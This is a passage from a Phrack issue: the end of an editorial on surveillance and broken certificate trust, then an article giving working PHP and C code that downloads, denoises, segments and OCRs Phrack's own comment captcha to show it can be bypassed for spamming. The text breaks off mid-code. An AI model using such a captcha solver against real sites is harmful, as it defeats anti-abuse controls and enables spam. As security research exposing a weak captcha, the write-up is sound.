citizens. No matter if picture, song, movie or academic paper, you shall pay
|
|
for its consumption or be banned from the net [5]. That they are actually
|
|
trying to resist evolution [6] is of no concern to them.
|
|
|
|
In times like these, when your network traffic may go through more deep
|
|
packet inspection engines than observable hops in traceroute, the hacker
|
|
shall reconsider his ways of communication. It is no longer enough to
|
|
SSH/VPN into one of your boxes and jump into your screen sessions, as the
|
|
communication of that box is monitored as much as your home network
|
|
connection.
|
|
|
|
Global surveillance is no longer stuff from science fiction books, or
|
|
attributed only to the most powerful secret services in the world. It
|
|
becomes a requirement for most ISPs to stay in business. They can either
|
|
sell you, or they can sell their company, and you can bet that the latter is
|
|
not an option they consider.
|
|
|
|
Besides, traffic patterns of the average internet user change. We are
|
|
approaching a time when the ordinary user will only emit HTTP traffic with
|
|
his daily activities, making it easy for anyone interested to single out
|
|
the more creative minds, just by the fact that they still use protocols
|
|
like SSH, OpenVPN and IRC with their unmistakable signatures. It is up to
|
|
us to come up with new and creative ways of using this internet before
|
|
packets get dropped based on their protocol characteristics and we find
|
|
ourselves limited to Google+ and Facebook.
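(A quick one-liner is enough to see how such traffic stands out: the SSH
banner, for instance, travels in cleartext in the very first packets of
every connection. A minimal sketch, interface name purely illustrative:

  $ tcpdump -A -n -i eth0 'tcp port 22' | grep -m1 'SSH-2.0'

Anyone sitting on the wire can run the same thing against you.)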
|
|
|
|
At the same time, the additional protections we have come to rely on prove
|
|
to be as bad as we always thought they might be. When breaking into a
|
|
certificate authority is as easy as it was with DigiNotar [7], when the
|
|
database of Comodo [8] ends up in BitTorrents, we are facing bigger
|
|
challenges than ever before. There are various discussions all over the net
|
|
on how to deal with the mess that is our common PKI. From the IETF [9] to
|
|
nation states, everyone has their own ideas. When certificate authorities
|
|
are taken over by governments or forced to issue Sub-CA certificates to the
|
|
same [10], it's not a trust mechanism we shall rely on.
|
|
|
|
An attitude that this is someone else's problem doesn't help. As more and
|
|
more functions of daily life move online, everyone is exposed to these
|
|
problems. Even if you know how to spot certificate changes, you will still
|
|
need to access the web site. HTTPS doesn't provide a plan B option. The CA
|
|
nightmare calls for the gifted and smart people to work together and find a
|
|
long term dependable solution. This is the time where your talent, skills
|
|
and experience are required, unless you are fine with government and vendor
|
|
driven committees to "solve" it.
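(Until something better exists, one crude way to watch a certificate
yourself is to pull it and compare its fingerprint against what you
recorded last time. A minimal sketch, host name purely illustrative:

  $ openssl s_client -connect www.example.org:443 </dev/null 2>/dev/null \
    | openssl x509 -noout -fingerprint -sha1

Diff today's output against yesterday's and you will at least notice when
the certificate changes, even if you still have to decide what to do then.)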
|
|
|
|
Meanwhile over at IRC's little pre-teen sister Twitter, whose attention
|
|
span is shorter than that of a fruit fly and easily bought, people hype
|
|
so-called solutions [11] to the problem without question. Although their
|
|
heroes abandon privacy solutions people depend on the moment someone waves a
|
|
little money in their face [12], the masses would rather believe in a savior
|
|
than think and evaluate for themselves. Are you one of them?
|
|
|
|
Unquestioned belief becomes the new normal. Whether it is Google or Apple
|
|
fanboyism, the companies can do whatever they want. Apple ships products
|
|
with several year old vulnerabilities [13] in open source components they
|
|
reused and nobody notices. Everyone can make X.509 certificates that iPhone
|
|
and iPad will happily accept [14]? No problem. Think back and consider the
|
|
shit storm if that would have been Microsoft. These companies feel so
|
|
invincible that Apple's App Store Guidelines [15] openly state: "If you run
|
|
to the press and trash us, it never helps."
|
|
Critical thinking seems to become a challenge when you get what you want.
|
|
Just look at how many hackers use Gmail without any end-to-end encryption,
|
|
because it just works. Which hacker using a hotmail email address was ever
|
|
taken seriously? Where is the difference?
|
|
|
|
What Apple and Google are for the hip generation, Symantec is for
|
|
governments and corporations. They are seen as the one company that will
|
|
protect us all. When the source code of PCAnywhere is leaked [16] and the
|
|
same company simply advises its users to no longer use that software
|
|
product [17], you get an idea of how they evaluate the security of it
|
|
themselves. And what about all the systems in daily life that depend on it?
|
|
If nobody used PCAnywhere, Symantec would have stopped selling it long ago.
|
|
Therefore, they simply left a large user base out in the cold. And what
|
|
happens? Nothing. Except, maybe, that some have fun with various remote
|
|
access points.
|
|
|
|
It all comes down to knowledge. Knowledge cannot be obtained by belief.
|
|
Belief is a really bad substitute for actually knowing. And what is the
|
|
hacker community other than first and foremost the quest for knowledge that
|
|
you found out yourself by critically questioning everything put in front of
|
|
you? What you do with that knowledge is a question everyone has to answer
|
|
himself. But if we stop to learn, experiment and play, we stop being
|
|
hackers and become part of the masses. It is a sign of the times when only
|
|
very few hackers speak IPv6, let alone use it. When you see more fuzzers
|
|
written than lines of code actually read, because coding up a simple
|
|
trash-generator is so much easier than actually understanding what the code
|
|
does and then precisely exploiting it.
|
|
|
|
The quest for knowledge defines us, not money or fame. Let's keep it up!
|
|
|
|
|
|
[1] https://en.wikipedia.org/wiki/Arab_spring
|
|
[2] https://en.wikipedia.org/wiki/2011%E2%80%932012_Syrian_uprising
|
|
[3] http://buggedplanet.info/index.php?title=EG
|
|
[4] https://en.wikipedia.org/wiki/Telecommunications_data_retention
|
|
[5] https://en.wikipedia.org/wiki/Three_strikes_%28policy%29
|
|
[6] http://www.wired.com/threatlevel/2012/02/peter-sunde/
|
|
[7] https://en.wikipedia.org/wiki/DigiNotar
|
|
[8] https://en.wikipedia.org/wiki/Comodo_Group#Breach_of_security
|
|
[9] http://www.ietf.org/mail-archive/web/therightkey/current/maillist.html
|
|
[10] https://bugzilla.mozilla.org/show_bug.cgi?id=724929
|
|
[11] https://en.wikipedia.org/wiki/Convergence_%28SSL%29
|
|
[12] https://en.wikipedia.org/wiki/Whisper_Systems#Acquisition_by_Twitter
|
|
[13] http://support.apple.com/kb/HT5005
|
|
[14] http://support.apple.com/kb/HT4824
|
|
[15] https://developer.apple.com/appstore/guidelines.html
|
|
[16] http://resources.infosecinstitute.com/pcanywhere-leaked-source-code/
|
|
[17] http://www.symantec.com/connect/sites/default/files/pcAnywhere
|
|
%20Security%20Recommendations%20WP_01_23_Final.pdf
|
|
|
|
|
|
[ EOF ]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x04 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------------=[ L I N E N O I S E ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ various ]=-------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
Linenoise iz back! The last one was in Issue 0x3f (2005 ffs) and since we
|
|
had great short and sweet submissions we thought it was about time to
|
|
resurrect it. After all, "a strong linenoise is key" ;-)
|
|
|
|
So, dear hacker, enjoy a strong Linenoise.
|
|
|
|
|
|
--[ Contents
|
|
|
|
1 - Spamming PHRACK for fun and profit -- darkjoker
|
|
2 - The Dangers of Anonymous Email -- DangerMouse
|
|
3 - Captchas Round 2 -- PHRACK PHP
|
|
CoderZ Team
|
|
4 - XSS Using NBNS on a Home Router -- Simon Weber
|
|
5 - Hacking the Second Life Viewer For Fun and Profit -- Eva
|
|
6 - How I misunderstood digital radio -- M.Laphroaig
|
|
|
|
|
|
|=[ 0x01 ]=---=[ Spamming PHRACK for fun & profit - darkjoker ]=---------=|
|
|
|
|
In this paper I'd like to explain how a captcha can be bypassed without
|
|
problems with just a few lines of C. First of all we'll pick a captcha to
|
|
bypass, and, of course, is there any better captcha than the one of this
|
|
site? Of course not, so we'll take it as an example. You may have noticed
|
|
that there are many different spam messages in the comments of the
|
|
articles, which means that probably someone else has already bypassed the
|
|
captcha but, instead of writing an article about it, decided to spend his
|
|
time posting spam all around the site. Well, I hope that this article will
|
|
also be taken into account in the decision to change the captcha, because
|
|
this one is really weak.
|
|
|
|
First of all we're going to download some captchas, so that we'll be able
|
|
to teach our bot how to recognise a random captcha. In order to download
|
|
some captchas I've written this PHP code:
|
|
|
|
<?php
|
|
mkdir ("images");
|
|
for ($i=0;$i<200;$i++)
|
|
file_put_contents ("images/{$i}.jpg",file_get_contents
|
|
("http://www.phrack.com/captcha.php"));
|
|
?>
|
|
|
|
We're downloading 200 captchas, which should be enough. Ok, once we
|
|
have downloaded all the images we can proceed to clean them (which
|
|
means we're going to remove the "noise"). In these captchas the noise is
|
|
just made of some pixels of a lighter blue than the one used to draw the
|
|
letters. Well, it's kind of a mess to work with JPEG images, so we'll
|
|
convert all the images to PPM, which will make our work easier.
|
|
|
|
Luckily under Linux there's a command which makes the conversion really
|
|
easy and we won't need to do it manually:
|
|
|
|
convert -compress None input.jpg output.ppm
|
|
|
|
Let's do it for every image we have:
|
|
|
|
<?php
|
|
mkdir ("ppm");
|
|
for ($i=0;$i<200;$i++)
|
|
system ("convert -compress None images/{$i}.jpg ppm/{$i}.ppm");
|
|
?>
|
|
|
|
Perfect, now we have everything we need to proceed. Now, as I said
|
|
earlier, we have to remove the noise. Here's a function which loads an
|
|
image into memory; the noise removal routine comes right after:
|
|
|
|
void load_image (int v) {
|
|
char img[32],line[1024];
|
|
int n,i,d,k;
|
|
FILE *fp;
|
|
sprintf (img, "ppm/%d.ppm",v);
|
|
fp = fopen (img, "r");
|
|
do
|
|
fgets (line, sizeof(line),fp);
|
|
while (strcmp (line, "255\n"));
|
|
i=0;
|
|
d=0;
|
|
k=0;
|
|
|
|
while (i!=40) {
|
|
fscanf (fp,"%d",&n);
|
|
captcha[i][d][k]=(char)n;
|
|
k++;
|
|
if (k==3) {
|
|
k=0;
|
|
if (d<119)
|
|
d++;
|
|
else {
|
|
i++;
|
|
d=0;
|
|
}
|
|
}
|
|
}
|
|
fclose (fp);
}
|
|
|
|
Ok, this piece of code loads an image into 'captcha', which is a 3-
|
|
dimensional array (rows x cols x 3 bytes, one per color channel). Once
|
|
the array is loaded, clear_noise () (written below) will remove the noise.
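For reference, this is why load_image () just skips header lines until it
hits the line containing "255": an ASCII PPM (P3) file, as produced by
convert with -compress None, starts with a small text header before the
pixel data. A sketch of such a header (the comment line is optional and
its exact content depends on the converter):

  P3
  # CREATOR: ...
  120 40
  255
  86 113 154 86 113 154 ...

First the magic number, then width and height, then the maximum color
value, and finally the R G B triplets that the fscanf () loop reads.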
|
|
|
|
void clear_noise () {
|
|
int i,d,k,t,ti,td;
|
|
char n[3];
|
|
/* The borders are always white */
|
|
for (i=0;i<40;i++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[i][0][k]=255;
|
|
captcha[i][119][k]=255;
|
|
}
|
|
for (d=0;d<120;d++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[0][d][k]=255;
|
|
captcha[39][d][k]=255;
|
|
}
|
|
/* Starts removing the noise */
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
|
|
captcha[i][d][2]>__COL)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
for (i=1;i<39;i++) {
|
|
for (d=1;d<119;d++) {
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[i][d][k]!=255)
|
|
t=1;
|
|
if (t) {
|
|
ti=i-1;
|
|
td=d-1;
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td+=2;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i+1;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
if (t<=__MIN) /* too few dark neighbour channels (4 pixels * 3): noise */
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
Well, what does this function do? It's really simple: first of all it clears
|
|
all the borders (because we know by looking at the downloaded images that
|
|
the borders never contain any character). Once the borders are cleaned,
|
|
the second part of the routine will remove all the light blue pixels,
|
|
turning them into white pixels. This way we'll obtain an almost perfect
|
|
image. The only issue is that there are some pixels which are as dark as
|
|
the ones which compose the characters, so we can't remove them with the
|
|
method above, so we have to come up with something new. My idea was to
|
|
"delete" all the pixels which have no blue pixels near them, so that the
|
|
few blue pixels which don't compose the letters will be deleted. In
|
|
order to make the image cleaner I decided to delete all the pixels which
|
|
don't have at least 3 dark pixels near them. You may have noticed that __COL
|
|
and __MIN are not defined in the source above, these are two numbers:
|
|
|
|
#define __COL 0x50
|
|
#define __MIN 4*3
|
|
|
|
__COL is a number I used when I delete all the light blue pixels, I use it
|
|
in this line:
|
|
|
|
if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
|
|
captcha[i][d][2]>__COL)
|
|
|
|
In a few words, if the pixel is lighter than #505050 then it will be
|
|
deleted (turned white). __MIN is the minimum number of neighbouring pixels
|
|
below which the pixel is deleted. The values were obtained after a few
|
|
attempts.
|
|
|
|
Perfect, now we have a piece of code which loads and clears a captcha. Our
|
|
next goal is to split the characters so that we'll be able to recognise
|
|
each of them. Before doing all this work we'd better start working with 2
|
|
dimensional arrays, it'll make our work easier, so I've written some lines
|
|
which make this happen:
|
|
|
|
void make_bw () {
|
|
int i,d;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]!=255)
|
|
bw[i][d]=1;
|
|
else
|
|
bw[i][d]=0;
|
|
}
|
|
|
|
This simply transforms the image into a black and white one, so that we can
|
|
use a 2-dimensional array. Now we can proceed to splitting the letters.
|
|
In order to separate the letters we need to obtain two pixels
|
|
whose coordinates are the ones of the upper left corner and the lower right
|
|
corner. Once we have the coordinates of these two corners we'll be able to
|
|
cut a rectangle which contains a character.
|
|
|
|
Well, we're going to begin scanning the image from the left to the right,
|
|
column by column, and every time we find a black pixel in a column
|
|
which is preceded by an entire-white column, we'll know that in that column
|
|
a new character begins, while when we find an entire-white column
|
|
preceded by a column which contains at least one black pixel we'll know
|
|
that a character ends there.
|
|
|
|
Now, after this procedure is done we should have 12 different numbers which
|
|
represent the columns where each character begins and ends. The next step
|
|
is to find the rows where the letter begins and ends, so that we can obtain
|
|
the coordinates of the pixels we need. Let's call the column where the Xth
|
|
character begins CbX and the column where the Xth character ends CeX. Now
|
|
we'll start our scan from the top to the bottom of the image to find the
|
|
upper coordinate and from the bottom to the top to find the lower
|
|
coordinate.
|
|
|
|
This time, of course, the scan will be done six times using as limits the
|
|
columns where each character is contained between.
|
|
|
|
When the first row which contains a pixel is found (let's call this row
|
|
RbX) the same thing will be done to find the lower coordinate. The only
|
|
difference will be that the scan will begin from the bottom. That's done
|
|
this way because some characters (such as the 'j') are divided into two
|
|
parts, and if the scan simply continued down from the top the result
|
|
would have been just a dot instead of the whole letter.
|
|
|
|
After having scanned the image from the bottom to the top we'll have
|
|
another row where the letter ends (or begins from the bottom), we'll call
|
|
this row ReX (of course we're talking about the Xth character).
|
|
|
|
Now we know which are the horizontal and vertical coordinates of the two
|
|
corners we're interested in (which are C1X(CbX,RbX) and C2X(CeX,ReX)), so
|
|
we can proceed by filling a (CeX-CbX)*(ReX-RbX) matrix which will contain
|
|
the Xth character. Obviously the matrix will be filled with the bits of the
|
|
Xth character.
|
|
|
|
void scan () {
|
|
int i,d,k,j,c,coord[6][2][2];
|
|
for (d=0,j=0,c=0;d<120;d++) {
|
|
for (i=0,k=0;i<40;i++)
|
|
if (bw[i][d])
|
|
k=1;
|
|
if (k && !j) {
|
|
j=1;
|
|
coord[c][0][0]=d;
|
|
}
|
|
else if (!k && j) {
|
|
j=0;
|
|
coord[c++][0][1]=d;
|
|
}
|
|
}
|
|
for (c=0;c<6;c++) {
|
|
coord[c][1][0]=-1;
|
|
coord[c][1][1]=-1;
|
|
for (i=0;(i<40 && coord[c][1][0]==-1);i++)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][0]=i;
|
|
break;
|
|
}
|
|
for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][1]=i;
|
|
break;
|
|
}
|
|
for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
|
|
for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
|
|
chars[c][j][k]=bw[i][d];
|
|
dim[c][0]=j;
|
|
dim[c][1]=k;
|
|
}
|
|
}
|
|
|
|
Ok, now, using this function we're going to obtain all the characters
|
|
split into an array of 2-dimensional arrays. The next step will be the
|
|
most boring one, because we're going to sort all the characters by hand, so
|
|
that the program, after our work, will be able to recognise all of them and
|
|
learn how each character is made. Before that, we need a new directory
|
|
which will contain all the characters. A simple 'mkdir chars' will do.
|
|
Now we have to fill the directory with the characters. Here's a main
|
|
function whose goal is to divide all the captchas into characters and put
|
|
them in the chars/ directory.
|
|
|
|
int main () {
|
|
int i,d,k,c,n;
|
|
FILE *x;
|
|
char path[32];
|
|
for (n=0,k=0;n<200;n++) {
|
|
load_image (n);
|
|
clear_noise ();
|
|
make_bw ();
|
|
scan ();
|
|
for (c=0;c<6;c++,k++) {
|
|
sprintf (path,"chars/%d.ppm",k);
|
|
x=fopen (path,"w");
|
|
fprintf (x,"P1\n#asdasd\n\n%d %d\n",dim[c][1],dim[c][0]);
|
|
for (i=0;i<dim[c][0];i++) {
|
|
for (d=0;d<dim[c][1];d++)
|
|
fprintf (x,"%d",chars[c][i][d]);
|
|
fprintf (x,"\n");
|
|
}
|
|
fclose (x);
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
Very well, now the chars/ directory contains all the files we need. Now
|
|
comes the part where a human is supposed to sort the characters into the
|
|
right directories. To make this work faster I've used a simple PHP script
|
|
which helps a little:
|
|
|
|
<?php
|
|
$in=fopen ("php://stdin","r");
|
|
mkdir ("c");
|
|
for ($i=0;$i<26;$i++)
|
|
mkdir ("c/".chr(ord('a')+$i));
|
|
for ($i=0;$i<10;$i++)
|
|
mkdir ("c/".chr(ord('0')+$i));
|
|
for ($i=54;$i<1200;$i++) {
|
|
echo $i.": ";
|
|
$a = trim(fgets ($in,1024));
|
|
if ($a!='.')
|
|
system ("cp chars/{$i}.ppm c/{$a}/{$i}.ppm");
|
|
}
|
|
fclose ($in);
|
|
?>
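A sketch of what a classification session looks like (script name purely
illustrative); for each chars/N.ppm you type the character you read in it,
or '.' to skip an unreadable one:

  $ php sort.php
  54: z
  55: 7
  56: .
  ...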
|
|
|
|
I think there's nothing to be explained, it's just a few lines of code.
|
|
After the script is run and someone (me) enters all the data needed
|
|
we're going to have a c/ directory with some subdirectories in which there
|
|
are all the characters divided.
|
|
|
|
Some characters ('a','e','i','o','u','l','0','1') never appear, which means
|
|
that probably the author of the captcha decided not to include these
|
|
characters.
|
|
|
|
Anyway that's not a problem for us. Now, we should work out a way to make
|
|
our program recognise a character. My idea was to divide the image into 4
|
|
parts (horizontally), and then count the number of black (1) pixels in each
|
|
part, so that when we have an unknown character all our program will be
|
|
supposed to do is to count the number of black pixels for each part of the
|
|
image, and then search for the character with the closest number of black
|
|
pixels. I tried that, but I hadn't taken into account that some
|
|
characters (such as 'q' and 'p') have a similar number of pixels for each
|
|
part, even though they're completely different.
|
|
|
|
After having realised that, I decided to use 8 parts to divide each
|
|
character: 4 parts horizontally, then each part is divided into 2 parts
|
|
vertically.
|
|
|
|
Well, of course there's no way I could have done that by hand, and in fact
|
|
I've written a PHP script:
|
|
|
|
<?php
|
|
error_reporting (E_ALL ^ E_NOTICE);
|
|
$f = array (4,2,4/3,1);
|
|
$arr=array ('b','c','d','f','g','h','j','k','m','n','p','q','r','s','t',
|
|
'v','w','x','y','z','2','3','4','5','6','7','8','9');
|
|
$h = array ();
|
|
for ($a=0;$a<count($arr);$a++) {
|
|
$i = $arr[$a];
|
|
$x = array ();
|
|
$files = scandir ("c/{$i}");
|
|
for ($d=0;$d<count($files);$d++) {
|
|
if ($files[$d][0]!='.') { // Excludes '.' and '..'
|
|
$lines=explode ("\n",file_get_contents ("c/{$i}/{$files[$d]}"));
|
|
for ($k=0;$k<4;$k++)
|
|
array_shift ($lines);
|
|
array_pop ($lines);
|
|
$j = count ($lines);
|
|
$k = strlen ($lines[0]);
|
|
$r=0;
|
|
$h[$a] += $j;
|
|
|
|
for ($n=0;$n<4;$n++)
|
|
for (;$r<floor ($j/$f[$n]);$r++) {
|
|
for ($l=0;$l<floor($k/2);$l++)
|
|
$x[$n][0]+=$lines[$r][$l];
|
|
for (;$l<floor($k);$l++)
|
|
$x[$n][1]+=$lines[$r][$l];
|
|
}
|
|
|
|
|
|
}
|
|
}
|
|
$h [$a] = round ($h[$a]/(count($files)-2));
|
|
for ($n=0;$n<4;$n++) {
|
|
$x[$n][0] = round ($x[$n][0]/(count($files)-2));
|
|
$x[$n][1] = round ($x[$n][1]/(count($files)-2));
|
|
}
|
|
printf ("$i => %02d %02d %02d %02d / %02d %02d %02d %02d\n",$x[0][0],
|
|
$x[1][0],$x[2][0],$x[3][0],$x[0][1],$x[1][1],$x[2][1],$x[3][1]);
|
|
}
|
|
for ($i=0;$i<count ($arr);$i++)
|
|
echo "{$h[$i]}, ";
|
|
|
|
?>
|
|
|
|
It works out the average number of black pixels for each part. Moreover it
|
|
also prints the average height of each character (I'm going to explain the
|
|
reason for this below).
|
|
|
|
A character such as a 'z' is divided this way:
|
|
|
|
01111 111110
|
|
11111 111111
|
|
11111 111111
|
|
01111 111111
|
|
|
|
00000 111110
|
|
00000 111110
|
|
00000 111100
|
|
00001 111100
|
|
|
|
00001 111000
|
|
00011 110000
|
|
00011 110000
|
|
00111 100000
|
|
|
|
00111 111110
|
|
01111 111111
|
|
01111 111111
|
|
00111 111110
|
|
|
|
So the numbers (of the black pixels) in this case will be:
|
|
|
|
18 23
|
|
1 18
|
|
8 8
|
|
14 22
|
|
|
|
Well, once all these numbers are taken from each character, the PHP script
|
|
written above works out the average numbers for each character. In the
|
|
'z', for example, the average numbers are:
|
|
|
|
18 20
|
|
3 15
|
|
11 7
|
|
17 20
|
|
|
|
Which are really close to the ones written above (at least, they're closer
|
|
than the ones of the other characters). Now the last step is to do the
|
|
comparison between the character of the captcha we want our program to read
|
|
and the numbers we've stored. To do so we first need to make the program
|
|
count the number of black pixels of a character, and save the numbers
|
|
somewhere so that it'll be possible to do the comparison. read_pixels ()'s
|
|
aim is exactly to do that, using the same method used above in the PHP
|
|
script.
|
|
|
|
void read_pixels (int c) {
|
|
int i,d,k,r;
|
|
float arr[]={4,2,1.333333,1};
|
|
memset (bpix,0,8*sizeof(int));
|
|
for (k=0,i=0;k<4;k++) {
|
|
for (;i<(int)(dim[c][0]/arr[k]);i++) {
|
|
for (d=0;d<dim[c][1]/2;d++)
|
|
bpix[k][0] += chars[c][i][d];
|
|
for (;d<dim[c][1];d++)
|
|
bpix[k][1] += chars[c][i][d];
|
|
}
|
|
}
|
|
}
|
|
|
|
The next step is to compare the numbers, that's what the cmp () function is
|
|
supposed to do:
|
|
|
|
char cmp (int c) {
|
|
int i,d;
|
|
int err,n,min,min_i;
|
|
read_pixels (c);
|
|
for (i=0,min=-1;i<28;i++) {
|
|
n=abs(heights[i]-dim[c][0])*__HGT;
|
|
for (d=0;d<4;d++) {
|
|
n += abs(bpix[d][0]-table[i][0][d]);
|
|
n += abs(bpix[d][1]-table[i][1][d]);
|
|
}
|
|
if (min>n || min<0) {
|
|
min=n;
|
|
min_i = i;
|
|
}
|
|
}
|
|
return ch_list[min_i];
|
|
}
|
|
|
|
'table' is an array in which all the average numbers worked out before are
stored. As you can see there's a final number (n) which is the sum of terms
obtained in this way:

n += |x - y|
|
|
|
|
Where 'x' is the number of black pixels in a part of the character we want
to read, and 'y' is the stored average for the same part of the character
we are comparing it against. The smaller the resulting number, the closer
the match. At first I thought this algorithm would be good enough, but I
soon realised that the program misread too many characters (the 'y's, for
example, were usually read as 'v's). So I decided to make the final number
also depend on the height of the character, so that a 'v' and a 'y' (which
have different heights) can't be confused.
|
|
|
|
Before this change the program misread 17 characters out of 1200. Then,
after some tests, I found that by adding the difference of the heights
times a constant, the results got better: 3 wrong characters out of 1200.
|
|
|
|
n = |x-y|*k
|
|
|
|
Where 'x' is the height of the character we want to read and 'y' is the
height of the character we're comparing it against.
|
|
|
|
The constant (k) was worked out by trial and error and was finally given
the value 1.5. Now everything's ready; the last function I've written is
read_captcha(), which returns the captcha string.
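
For example, matching the scanned 'z' from above (height 16, black pixel
counts 18, 1, 8, 14 in the left halves and 23, 18, 8, 22 in the right
halves) against the stored averages for 'z' (height 16, then 18, 3, 11, 17
and 20, 15, 7, 20) gives:

  n = 1.5*|16-16|
    + |18-18| + |1-3| + |8-11| + |14-17|
    + |23-20| + |18-15| + |8-7| + |22-20|
    = 0 + 8 + 9 = 17

which should be smaller than the n obtained for any other character, so
cmp() picks 'z'.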
|
|
|
|
char *read_captcha (char *file) {
|
|
char *str;
|
|
int i;
|
|
str = malloc(7*sizeof(char));
|
|
load_image (file);
|
|
clear_noise ();
|
|
make_bw ();
|
|
scan ();
|
|
for (i=0;i<6;i++)
|
|
str[i]=cmp(i);
|
|
str[i]=0;
|
|
return str;
|
|
}
|
|
|
|
And... done :) Now our program can read a captcha without any problem. The
next step would be to code an entire spam bot but, since that would require
some testing and it wouldn't be nice to post random comments all over
Phrack, my article ends here.
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
#define __COL 80
|
|
#define __MIN 4*3
|
|
#define __HGT 1.5
|
|
|
|
unsigned char captcha[40][120][3];
|
|
unsigned char bw[40][120];
|
|
unsigned char chars[6][40][30];
|
|
int dim[6][2];
|
|
int bpix[4][2];
|
|
int heights[] = {
|
|
23, 16, 23, 23, 22, 23, 29,
|
|
23, 16, 16, 22, 22, 16, 16,
|
|
20, 16, 16, 16, 21, 16, 23,
|
|
24, 23, 23, 23, 23, 24, 24 };
|
|
char ch_list [] = "bcdfghjkmnpqrstvwxyz23456789";
|
|
int table [28][2][4]= {
|
|
{ {18, 28, 26, 28}, { 0, 20, 25, 29}},
|
|
{ {10, 17, 17, 10}, {21, 1, 1, 20}},
|
|
{ { 0, 20, 25, 29}, {18, 31, 26, 31}},
|
|
{ {10, 24, 18, 17}, {23, 12, 6, 5}},
|
|
{ {21, 25, 20, 8}, {28, 25, 29, 27}},
|
|
{ {18, 28, 25, 22}, { 0, 20, 25, 22}},
|
|
{ { 1, 9, 0, 14}, {13, 27, 28, 25}},
|
|
{ {18, 24, 30, 22}, { 0, 15, 21, 23}},
|
|
{ {24, 21, 20, 17}, {21, 25, 24, 20}},
|
|
{ {17, 18, 16, 14}, {20, 17, 16, 14}},
|
|
{ {27, 25, 29, 22}, {24, 25, 25, 0}},
|
|
{ {25, 25, 24, 0}, {27, 25, 29, 22}},
|
|
{ {14, 16, 15, 13}, {19, 2, 0, 0}},
|
|
{ {15, 16, 2, 9}, {12, 4, 18, 17}},
|
|
{ {15, 20, 15, 12}, { 5, 10, 5, 19}},
|
|
{ {13, 17, 15, 11}, {14, 14, 14, 10}},
|
|
{ { 9, 17, 20, 13}, {12, 18, 22, 14}},
|
|
{ { 9, 11, 11, 13}, {12, 13, 13, 12}},
|
|
{ {15, 19, 14, 14}, {16, 20, 15, 9}},
|
|
{ {18, 3, 11, 17}, {20, 15, 7, 20}},
|
|
{ {21, 4, 8, 24}, {21, 26, 19, 24}},
|
|
{ {16, 0, 6, 24}, {29, 23, 25, 28}},
|
|
{ { 5, 12, 23, 5}, {23, 24, 32, 24}},
|
|
{ {23, 25, 10, 20}, {18, 12, 26, 23}},
|
|
{ { 3, 21, 28, 24}, {16, 15, 30, 27}},
|
|
{ {18, 1, 11, 20}, {27, 24, 14, 3}},
|
|
{ {25, 24, 26, 23}, {28, 26, 28, 28}},
|
|
{ {20, 27, 16, 16}, {25, 26, 28, 9}} };
|
|
|
|
void clear () {
|
|
int i,d,k;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=0;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
bw[i][d]=0;
|
|
for (i=0;i<6;i++)
|
|
for (d=0;d<40;d++)
|
|
for (k=0;k<30;k++)
|
|
chars[i][d][k]=0;
|
|
for (i=0;i<6;i++)
|
|
for (d=0;d<2;d++)
|
|
dim[i][d]=0;
|
|
}
|
|
|
|
int numlen (int n) {
|
|
char x[16];
|
|
sprintf (x,"%d",n);
|
|
return strlen(x);
|
|
}
|
|
|
|
void load_image (char *img) {
|
|
char line[1024];
|
|
int n,i,d,k,l,s;
|
|
FILE *fp;
|
|
fp = fopen (img, "r");
|
|
do
|
|
fgets (line, sizeof(line),fp);
|
|
while (strcmp (line, "255\n"));
|
|
i=0;
|
|
d=0;
|
|
k=0;
|
|
int cnt=0;
|
|
while (i!=40) {
|
|
fscanf (fp,"%d",&n);
|
|
captcha[i][d][k]=(char)n;
|
|
k++;
|
|
if (k==3) {
|
|
k=0;
|
|
if (d<119)
|
|
d++;
|
|
else {
|
|
i++;
|
|
d=0;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
void clear_noise () {
|
|
int i,d,k,t,ti,td;
|
|
char n[3];
|
|
/* The borders are always white */
|
|
for (i=0;i<40;i++)
|
|
